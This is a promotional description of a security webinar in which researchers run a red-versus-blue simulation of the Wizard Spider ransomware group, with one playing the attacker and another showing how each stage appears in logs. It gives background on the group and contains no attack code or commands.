Red Team vs. Blue Team Intrusion Simulation Using Wizard Spider

The Wizard Spider cybercriminal group dates all the way back to 2016 when they first started attacks with the Trickbot botnet. More currently, Wizard Spider have been seen leveraging Ryuk and Conti ransomware and have taken organizations for tens of millions of dollars. They’ve also, recently, been tied to a “cartel” made up of 3 other cybercriminal gangs, all sharing infrastructure, victim data & leak sites, and tactics. And just as the sharing of threat intel makes defenses stronger, this sharing of “anti-threat intelligence” of sorts means Wizard Spider and their cartel counterparts are only becoming more effective at their craft.

In this webinar, the Threat Research team at Immersive Labs run a Red vs. Blue Adversary Simulation demonstrating what the Wizard Spider attackers do, and critically how you can spot them through logs, and some basic IR analysis.

  • Lead Threat Researcher, Alex Seymour, plays the role of Wizard Spider and uses an initial foothold to start exploring, exploiting, and pivoting through the network.
  • Director of Cyber Threat Research, Kev Breen, tracks what the attacker is doing before the inevitable ransomware arrives on the scene.
  • In this lively back-and-forth simulation, Alex works to exploit the network while Kev explains what each stage looks like in logs, using some basic IR skills like decoding powershell and more.